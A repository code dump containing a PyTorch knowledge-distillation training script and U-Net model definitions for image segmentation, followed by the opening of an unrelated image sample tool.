path.join(models_folder, snapshot_name + "_best"),
)
best_score = d
emailbot = EmailBot("../settings.json")
emailbot.sendOne(
{
"title": "显卡%s训练任务进行epoch=%s的测试" % (args.vis_dev, current_epoch),
"content": "测试分数%s" % d,
}
)
print("score: {}\tscore_best: {}".format(d, best_score))
return best_score
def train_epoch_kd(
args,
current_epoch,
seg_loss,
models,
optimizer,
scheduler,
train_data_loader,
):
model_s, model_t, model_t_cls = models
theta = args.theta
alpha = args.alpha
beta = args.beta
global logger
losses = AverageMeter()
dices = AverageMeter()
iterator = tqdm(train_data_loader)
if args.mode == "onlyT":
model_t.train(mode=True)
elif args.mode == "onlyS":
model_s.train(mode=True)
else:
model_s.train(mode=True)
model_t.eval()
if args.mode == "TwoTeacher":
model_t_cls.eval()
for i, sample in enumerate(iterator):
imgs = sample["img"].cuda(non_blocking=True)
msks = sample["msk"].cuda(non_blocking=True)
if args.mode != "onlyS":
out_t = model_t(imgs)[:, 0, ...]
soft_out_t = torch.sigmoid(out_t / 2)
feature_t = model_t.conv1(imgs)
feature_t = model_t.conv2(feature_t)
feature_t = model_t.conv3(feature_t)
feature_t = model_t.conv4(feature_t)
feature_t = model_t.conv5(feature_t)
if args.mode != "onlyT":
out_s = model_s(imgs)[:, 0, ...]
soft_out_s = torch.sigmoid(out_s / 2)
feature_s = model_s.conv1(imgs)
feature_s = model_s.conv2(feature_s)
feature_s = model_s.conv3(feature_s)
feature_s = model_s.conv4(feature_s)
feature_s = model_s.conv5(feature_s)
if args.mode == "TwoTeacher":
# out_t_cls = model_t_cls(imgs)
# soft_out_t_cls = channel_five2two(F.softmax(out_t_cls, dim=1))[:, 1, ...]
feature_tmp = model_t_cls.conv1(imgs)
feature_tmp = model_t_cls.conv2(feature_tmp)
feature_tmp = model_t_cls.conv3(feature_tmp)
feature_tmp = model_t_cls.conv4(feature_tmp)
feature_tmp = model_t_cls.conv5(feature_tmp)
feature_t_cls = model_t_cls.conv1(imgs)
feature_t_cls = model_t_cls.conv2(feature_t_cls)
feature_t_cls = model_t_cls.conv3(feature_t_cls)
feature_t_cls = model_t_cls.conv4(feature_t_cls)
feature_t_cls = model_t_cls.conv5(feature_t_cls)
feature_t_cls = torch.cat([feature_tmp, feature_t_cls], 1)
# parser.add_argument('--loss',default='onlyCls',choices = ['onlyCls','Cls+LWF','Cls+LFL','Cls+LWF+LFL','TwoTeacher'])
if args.mode in ["T-S", "TwoTeacher"]:
loss_seg = seg_loss(soft_out_s, msks)
loss_cls = -torch.log(
1e-9 + soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
).mean()
loss = theta * loss_cls + loss_seg
if args.LWF:
loss_ko = -(
(soft_out_t * msks + (1 - soft_out_t) * (1 - msks))
* torch.log(
1e-9 + soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
)
).mean()
loss += loss_ko * beta
if args.LFL:
loss_kf = torch.norm(feature_t - feature_s, p=2, dim=0).mean()
loss += loss_kf * alpha
if args.KL:
soft_out_s = torch.sigmoid(out_s)
softmax_s = torch.cat(
((1 - soft_out_s).unsqueeze(1), soft_out_s.unsqueeze(1)), dim=1
)
soft_out_t = torch.sigmoid(out_t)
softmax_t = torch.cat(
((1 - soft_out_t).unsqueeze(1), soft_out_t.unsqueeze(1)), dim=1
)
loss_kl = (
(torch.log(1e-9 + softmax_s) - torch.log(1e-9 + softmax_t))
* softmax_s
).mean()
loss += loss_kl
if args.mode == "TwoTeacher":
loss_t_cls = theta * loss_cls
# if args.LWF:
# loss_ko_cls = (
# -(
# (soft_out_t * msks + (1 - soft_out_t) * (1 - msks))
# * torch.log(
# soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
# )
# ).mean()
# / 2.0
# )
# loss_t_cls += beta * loss_ko_cls
if args.clsLFL:
loss_kf_cls = torch.norm(
feature_s - feature_t_cls[:, :2048, ...], p=2, dim=0
).mean()
loss_t_cls += args.alpha_cls * loss_kf_cls
# if args.KL:
# loss_kl_cls = (
# (torch.log(softmax_s) - F.log_softmax(out_t_cls, dim=1))
# * softmax_s
# ).mean()
# loss_t_cls += loss_kl_cls
loss = (1 - args.m) * loss + args.m * loss_t_cls
with torch.no_grad():
dice_sc = 1 - dice_round(soft_out_s, msks[:, 0, ...])
elif args.mode == "onlyT":
loss_seg = seg_loss(soft_out_t, msks)
loss_cls = -torch.log(
1e-9 + soft_out_t * msks + (1 - soft_out_t) * (1 - msks)
).mean()
loss = theta * loss_cls + loss_seg
with torch.no_grad():
dice_sc = 1 - dice_round(soft_out_t, msks[:, 0, ...])
else:
loss_seg = seg_loss(soft_out_s, msks)
loss_cls = -torch.log(
1e-9 + soft_out_s * msks + (1 - soft_out_s) * (1 - msks)
).mean()
loss = theta * loss_cls + loss_seg
with torch.no_grad():
dice_sc = 1 - dice_round(soft_out_s, msks[:, 0, ...])
losses.update(loss.item(), imgs.size(0))
dices.update(dice_sc, imgs.size(0))
if not args.LWF:
loss_ko = torch.tensor(0)
if not args.LFL:
loss_kf = torch.tensor(0)
if not args.KL:
loss_kl = torch.tensor(0)
if args.mode == "T-S":
iterator.set_description(
"epoch: {}; lr {:.7f}; Loss {loss.val:.4f} ({loss.avg:.4f}),Loss_cls {loss_cls:.4f},Loss_kf {loss_kf:.4f},Loss_ko {loss_ko:.4f},Loss_kl {loss_kl:.4f},Loss_seg {loss_seg:.4f}; Dice {dice.val:.4f} ({dice.avg:.4f})".format(
current_epoch,
scheduler.get_lr()[-1],
loss=losses,
loss_cls=theta * loss_cls.item(),
loss_kf=alpha * loss_kf.item(),
loss_ko=beta * loss_ko.item(),
loss_kl=loss_kl.item(),
loss_seg=loss_seg.item(),
dice=dices,
)
)
elif args.mode == "TwoTeacher":
loss_ko_cls = torch.tensor(0)
if not args.clsLFL:
loss_kf_cls = torch.tensor(0)
loss_kl_cls = torch.tensor(0)
iterator.set_description(
"epoch: {}; lr {:.7f}; Loss {loss.val:.4f} ({loss.avg:.4f}),Loss_cls {loss_cls:.4f},Loss_kf {loss_kf:.4f},Loss_ko {loss_ko:.4f},Loss_kl {loss_kl:.4f},Loss_kf_cls {loss_kf_cls:.4f},Loss_ko_cls {loss_ko_cls:.4f},Loss_kl_cls {loss_kl_cls:.4f},Loss_seg {loss_seg:.4f}; Dice {dice.val:.4f} ({dice.avg:.4f})".format(
current_epoch,
scheduler.get_lr()[-1],
loss=losses,
loss_cls=theta * loss_cls.item(),
loss_kf=alpha * loss_kf.item(),
loss_ko=beta * loss_ko.item(),
loss_kl=loss_kl.item(),
loss_kf_cls=alpha * loss_kf_cls.item(),
loss_ko_cls=beta * loss_ko_cls.item(),
loss_kl_cls=loss_kl_cls.item(),
loss_seg=loss_seg.item(),
dice=dices,
)
)
else:
iterator.set_description(
"epoch: {}; lr {:.7f}; Loss {loss.val:.4f}; Dice {dice.val:.4f} ({dice.avg:.4f})".format(
current_epoch, scheduler.get_lr()[-1], loss=losses, dice=dices
)
)
optimizer.zero_grad()
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
# loss.backward()
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), 1.1)
optimizer.step()
scheduler.step(current_epoch)
print(
"epoch: {}; lr {:.7f}; Loss {loss.avg:.4f}".format(
current_epoch, scheduler.get_lr()[-1], loss=losses
)
)
if __name__ == "__main__":
t0 = timeit.default_timer()
makedirs(models_folder, exist_ok=True)
seed = args.seed
vis_dev = args.vis_dev
os.environ["CUDA_VISIBLE_DEVICES"] = str(vis_dev)
cudnn.benchmark = True
batch_size = args.batch_size
val_batch_size = args.val_batch_size
snapshot_name = "loc_KD_{}_best".format(logger.log_id)
train_idxs, val_idxs = train_test_split(
np.arange(len(all_files)), test_size=0.1, random_state=seed
)
np.random.seed(seed + 123)
random.seed(seed + 123)
steps_per_epoch = len(train_idxs) // batch_size
validation_steps = len(val_idxs) // val_batch_size
print("steps_per_epoch", steps_per_epoch, "validation_steps", validation_steps)
data_train = TrainData(train_idxs)
val_train = ValData(val_idxs)
train_data_loader = DataLoader(
data_train,
batch_size=batch_size,
num_workers=5,
shuffle=True,
pin_memory=False,
drop_last=True,
)
val_data_loader = DataLoader(
val_train,
batch_size=val_batch_size,
num_workers=5,
shuffle=False,
pin_memory=False,
)
if args.mode == "onlyT":
model_t = SeResNext50_Unet_Loc().cuda()
elif args.mode == "onlyS":
model_s = SeResNext50_Unet_Loc_KD().cuda()
else:
model_s = SeResNext50_Unet_Loc_KD().cuda()
model_t = SeResNext50_Unet_Loc().cuda()
if args.mode == "TwoTeacher":
model_t_cls = SeResNext50_Unet_Double().cuda()
checkpoint = torch.load(
"weights/res50_cls_cce_1_tuned_best", map_location="cpu"
)
loaded_dict = checkpoint["state_dict"]
sd = model_t_cls.state_dict()
for k in model_t_cls.state_dict():
if k in loaded_dict and sd[k].size() == loaded_dict[k].size():
sd[k] = loaded_dict[k]
loaded_dict = sd
model_t_cls.load_state_dict(loaded_dict)
for (
key,
value,
) in (
model_t_cls.named_parameters()
): # named_parameters()包含网络模块名称 key为模型模块名称 value为模型模块值,可以通过判断模块名称进行对应模块冻结
value.requires_grad = False
if args.mode != "onlyT":
params = model_s.parameters()
optimizer = AdamW(params, lr=args.lr, weight_decay=args.weight_decay)
model_s, optimizer = amp.initialize(model_s, optimizer, opt_level="O0")
scheduler = lr_scheduler.MultiStepLR(
optimizer,
milestones=[4, 6, 8, 10, 12, 14, 15, 16, 17, 18, 19, 20],
gamma=0.5,
)
else:
params = model_t.parameters()
optimizer = AdamW(params, lr=args.lr, weight_decay=args.weight_decay)
model_t, optimizer = amp.initialize(model_t, optimizer, opt_level="O0")
scheduler = lr_scheduler.MultiStepLR(
optimizer,
milestones=[4, 6, 8, 10, 12, 14, 15, 16, 17, 18, 19, 20],
gamma=0.5,
)
seg_loss = ComboLoss({"dice": 3.0, "focal": 10.0}, per_image=False).cuda()
if args.mode in ["T-S", "TwoTeacher"]:
snap_to_load = "weights/res50_loc_0_tuned_best"
checkpoint = torch.load(snap_to_load, map_location="cpu")
loaded_dict = checkpoint["state_dict"]
sd = model_t.state_dict()
for k in model_t.state_dict():
if k in loaded_dict and sd[k].size() == loaded_dict[k].size():
sd[k] = loaded_dict[k]
loaded_dict = sd
model_t.load_state_dict(loaded_dict)
print(
"loaded checkpoint '{}' (epoch {}, best_score {})".format(
snap_to_load, checkpoint["epoch"], checkpoint["best_score"]
)
)
# named_parameters()包含网络模块名称 key为模型模块名称 value为模型模块值,可以通过判断模块名称进行对应模块冻结
for key, value in model_t.named_parameters():
value.requires_grad = False
del loaded_dict
del sd
del checkpoint
best_score = 0
_cnt = -1
torch.cuda.empty_cache()
if args.mode == "onlyT":
model_train = model_t
models = (None, model_t, None)
else:
model_train = model_s
if args.mode == "onlyS":
models = (model_s, None, None)
elif args.mode == "T-S":
models = (model_s, model_t, None)
else:
models = (model_s, model_t, model_t_cls)
for epoch in range(30):
train_epoch_kd(
args,
epoch,
seg_loss,
models,
optimizer,
scheduler,
train_data_loader,
)
if epoch % 2 == 0:
_cnt += 1
torch.cuda.empty_cache()
best_score = evaluate_val_kd(
args, val_data_loader, best_score, model_train, snapshot_name, epoch
)
elapsed = timeit.default_timer() - t0
print("Time: {:.3f} min".format(elapsed / 60))
emailbot = EmailBot("../settings.json")
emailbot.sendOne(
{"title": "显卡%s训练任务完成" % args.vis_dev, "content": "最佳分数%s" % best_score}
)
```
#### File: train_src/zoo/models_vis.py
```python
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import torchvision.models
from models import ConvRelu
from .senet import se_resnext50_32x4d, senet154
class SeResNext50_Unet_Loc(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Loc, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 2
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5], 1, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Loc_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Loc_KD, self).__init__()
encoder_filters = np.array([64, 256, 512, 1024, 2048])
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5], 1, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Loc_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Loc_KD, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5], 1, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Double(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Double, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 2
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5] * 2, 5, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward1(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return dec10
def forward(self, x):
dec10_0 = self.forward1(x[:, :3, :, :])
dec10_1 = self.forward1(x[:, 3:, :, :])
dec10 = torch.cat([dec10_0, dec10_1], 1)
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Double_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Double_KD, self).__init__()
encoder_filters = np.asarray([64, 256, 512, 1024, 2048])
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5] * 2, 5, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward1(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return dec10
def forward(self, x):
dec10_0 = self.forward1(x[:, :3, :, :])
dec10_1 = self.forward1(x[:, 3:, :, :])
dec10 = torch.cat([dec10_0, dec10_1], 1)
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SeResNext50_Unet_Double_KD(nn.Module):
def __init__(self, pretrained="imagenet", **kwargs):
super(SeResNext50_Unet_Double_KD, self).__init__()
encoder_filters = [64, 256, 512, 1024, 2048]
decoder_filters = np.asarray([64, 96, 128, 256, 512]) // 4
self.conv6 = ConvRelu(encoder_filters[-1], decoder_filters[-1])
self.conv6_2 = ConvRelu(
decoder_filters[-1] + encoder_filters[-2], decoder_filters[-1]
)
self.conv7 = ConvRelu(decoder_filters[-1], decoder_filters[-2])
self.conv7_2 = ConvRelu(
decoder_filters[-2] + encoder_filters[-3], decoder_filters[-2]
)
self.conv8 = ConvRelu(decoder_filters[-2], decoder_filters[-3])
self.conv8_2 = ConvRelu(
decoder_filters[-3] + encoder_filters[-4], decoder_filters[-3]
)
self.conv9 = ConvRelu(decoder_filters[-3], decoder_filters[-4])
self.conv9_2 = ConvRelu(
decoder_filters[-4] + encoder_filters[-5], decoder_filters[-4]
)
self.conv10 = ConvRelu(decoder_filters[-4], decoder_filters[-5])
self.res = nn.Conv2d(decoder_filters[-5] * 2, 5, 1, stride=1, padding=0)
self._initialize_weights()
encoder = se_resnext50_32x4d(pretrained=pretrained)
# conv1_new = nn.Conv2d(6, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
# _w = encoder.layer0.conv1.state_dict()
# _w['weight'] = torch.cat([0.5 * _w['weight'], 0.5 * _w['weight']], 1)
# conv1_new.load_state_dict(_w)
self.conv1 = nn.Sequential(
encoder.layer0.conv1, encoder.layer0.bn1, encoder.layer0.relu1
) # encoder.layer0.conv1
self.conv2 = nn.Sequential(encoder.pool, encoder.layer1)
self.conv3 = encoder.layer2
self.conv4 = encoder.layer3
self.conv5 = encoder.layer4
def forward1(self, x):
batch_size, C, H, W = x.shape
enc1 = self.conv1(x)
enc2 = self.conv2(enc1)
enc3 = self.conv3(enc2)
enc4 = self.conv4(enc3)
enc5 = self.conv5(enc4)
dec6 = self.conv6(F.interpolate(enc5, scale_factor=2))
dec6 = self.conv6_2(torch.cat([dec6, enc4], 1))
dec7 = self.conv7(F.interpolate(dec6, scale_factor=2))
dec7 = self.conv7_2(torch.cat([dec7, enc3], 1))
dec8 = self.conv8(F.interpolate(dec7, scale_factor=2))
dec8 = self.conv8_2(torch.cat([dec8, enc2], 1))
dec9 = self.conv9(F.interpolate(dec8, scale_factor=2))
dec9 = self.conv9_2(torch.cat([dec9, enc1], 1))
dec10 = self.conv10(F.interpolate(dec9, scale_factor=2))
return dec10
def forward(self, x):
dec10_0 = self.forward1(x[:, :3, :, :])
dec10_1 = self.forward1(x[:, 3:, :, :])
dec10 = torch.cat([dec10_0, dec10_1], 1)
return self.res(dec10)
def _initialize_weights(self):
for m in self.modules():
if (
isinstance(m, nn.Conv2d)
or isinstance(m, nn.ConvTranspose2d)
or isinstance(m, nn.Linear)
):
m.weight.data = nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
``` |
{
"source": "Jinhui-abc/Simd",
"score": 3
} |
#### File: pythonTools/sampleTool/sampleTool.py
```python
import json
import os
from cv2 import cv2
slice_test = True # 是否保存切片,本代码测试用
def saveBinaryImages(full_path, gray_img):
'''
: 功能:参照宋的代码,在写二进制文件的前面加上图片的高度和宽度
adaBoostApp 使用
'''
binary_image = open(full_path, "wb")
h = gray_img.shape[0]
w = gray_img.shape[1]
